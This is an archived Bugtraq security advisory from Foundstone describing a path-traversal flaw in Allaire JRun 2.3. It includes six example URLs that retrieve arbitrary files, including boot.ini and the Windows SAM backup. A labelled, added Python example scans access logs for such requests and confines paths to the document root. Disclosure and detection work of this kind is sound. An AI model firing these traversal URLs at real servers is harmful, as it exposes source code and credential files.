[17312] in bugtraq
Allaire JRUN 2.3 Arbitrary File Retrieval
daemon@ATHENA.MIT.EDU (Foundstone Labs)
Tue Oct 24 00:10:29 2000
Message-Id: <5B8559F3126DD4119C5100B0D022A06D1F4004@mailwest>
Date: Mon, 23 Oct 2000 11:28:28 -0700
Reply-To: Foundstone Labs <labs@FOUNDSTONE.COM>
From: Foundstone Labs <labs@FOUNDSTONE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"
Security Advisory
Allaire JRUN 2.3
----------------------------------------------------------------------
FS Advisory ID: FS-102300-13-JRUN
Release Date: October 23, 2000
Product: Allaire JRUN 2.3
Vendor: Allaire Inc. (http://www.allaire.com)
Vendor Advisory: http://www.allaire.com/security/
Type: Arbitrary File Retrieval
Severity: High
Author: Shreeraj Shah (shreeraj.shah@foundstone.com)
Saumil Shah (saumil.shah@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)
Operating Systems: All operating systems supported by JRUN
Vulnerable versions: JRUN Server v2.3
Foundstone Advisory:
http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13
----------------------------------------------------------------------
Description
Multiple source code disclosure ("show code") vulnerabilities exist in
Allaire's JRun Server 2.3, allowing an attacker to view the source code
of any file within the web document root of the web server.
Using the same vulnerability, it is also possible to retrieve
arbitrary files that lie outside the web document root on the
host operating system's file system.
Details
JRun 2.3 uses Java servlets to handle parsing of various types
of pages (for example, HTML and JSP). Based on the settings
in the rules.properties and servlets.properties files, it is
possible to invoke any servlet using the URL prefix
"/servlet/".
It is possible to use JRun's SSIFilter servlet to retrieve
arbitrary files on the target system. The following examples
show URLs that can be used to retrieve arbitrary files; the
first three invoke the servlet by its full class name and the
last three by the shorter name "ssifilter":
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
Note: It is assumed that JRun runs on host "jrun", port 8000.
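As an added example, not code from the Foundstone advisory or from Allaire JRun, the following Python script shows the two defensive pieces that follow from the details above: a scanner over web server access logs that flags requests whose path info climbs back out of the "/servlet/<name>/" namespace (the test.jsp source disclosure case) or above the web root entirely (the boot.ini case), and the path-confinement check a file-serving servlet needs so that path info cannot resolve outside the document root. The log lines, the client addresses, the document root /www/docroot and the function names are all constructed assumptions; only the "/servlet/" prefix and the request paths are taken from the advisory.

```python
"""Detect path-traversal requests aimed at a servlet URL prefix, and show the
path-confinement check a file-serving servlet needs.

Added example; not code from the Foundstone advisory or from Allaire JRun.
Assumed: Common Log Format access logs, the "/servlet/" prefix named in the
advisory, and a document root of /www/docroot. All sample lines are constructed.
"""

import posixpath
import re
from urllib.parse import unquote

SERVLET_PREFIX = "/servlet/"   # URL prefix that reaches any servlet (from the advisory)
DOCROOT = "/www/docroot"       # assumed document root; not from the advisory

# Common Log Format: client ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)'
)

# Constructed sample log; request paths follow the advisory's example URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Oct/2000:11:28:01 -0700] "GET /index.html HTTP/1.0" 200 1043
10.0.0.5 - - [23/Oct/2000:11:28:02 -0700] "GET /servlet/ssifilter/news.shtml HTTP/1.0" 200 512
10.0.0.9 - - [23/Oct/2000:11:28:03 -0700] "GET /servlet/ssifilter/../../test.jsp HTTP/1.0" 200 880
10.0.0.9 - - [23/Oct/2000:11:28:04 -0700] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini HTTP/1.0" 200 300
10.0.0.7 - - [23/Oct/2000:11:28:05 -0700] "GET /docs/../index.html HTTP/1.0" 200 1043
"""


def classify_path(raw_path: str) -> str:
    """Classify a request path by what its '..' segments reach.

    clean          no '..' segments at all
    dot-segments   '..' present but the path never leaves its own subtree
    servlet-escape path info climbs back out of "/servlet/<name>/" (the
                   advisory's test.jsp case: source returned instead of output)
    root-escape    the path climbs above the URL root (the boot.ini case)
    """
    path = unquote(raw_path.split("?", 1)[0])   # drop query, decode %xx once
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if ".." not in segments:
        return "clean"
    under_servlet = path.startswith(SERVLET_PREFIX) and len(segments) >= 2
    depth = 0
    verdict = "dot-segments"
    for i, seg in enumerate(segments):
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return "root-escape"
        # segments 0 and 1 are "servlet" and the servlet name; anything after
        # them that brings depth below 2 has left the servlet's namespace
        if under_servlet and i >= 2 and depth < 2:
            verdict = "servlet-escape"
    return verdict


def scan_log(text: str):
    """Return (client, path, status, verdict) for each escaping request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, status, _size = m.groups()
        verdict = classify_path(path)
        if verdict in ("servlet-escape", "root-escape"):
            findings.append((client, path, status, verdict))
    return findings


def confine_to_docroot(docroot: str, path_info: str):
    """Mitigation side: map servlet path info to a file only if the
    normalized result stays under docroot; otherwise return None."""
    root = posixpath.normpath(docroot)
    relative = unquote(path_info).lstrip("/")   # never join an absolute path
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for client, path, status, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:15s} {client:10s} {status} {path}")
    print(confine_to_docroot(DOCROOT, "/news.shtml"))
    print(confine_to_docroot(DOCROOT, "/../../../../../../../boot.ini"))
```

The scanner reports a 200 status alongside each finding because, for this class of bug, a successful response to an escaping path is the signal that the server actually handed the file over; a 404 on the same path suggests the fix from the vendor bulletin is in place. The confinement check normalizes before comparing, which is the property the vulnerable servlet lacked: the decision is made on the resolved path, not on the raw path info.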
Solution
Follow the recommendations given in Allaire Security Bulletin
ASB00-28, available at: http://www.allaire.com/security/
Credits
We would like to thank Allaire for their prompt reaction
to this problem and their co-operation in heightening
security awareness in the security community.
Disclaimer
The information contained in this advisory is the copyright
(C) 2000 of Foundstone, Inc. and believed to be accurate at
the time of printing, but no representation or warranty is
given, express or implied, as to its accuracy or completeness.
Neither the author nor the publisher accepts any liability
whatsoever for any direct, indirect or consequential loss or
damage arising in any way from any use of, or reliance placed
on, this information for any purpose. This advisory may be
redistributed provided that no fee is assigned and that the
advisory is not modified in any way.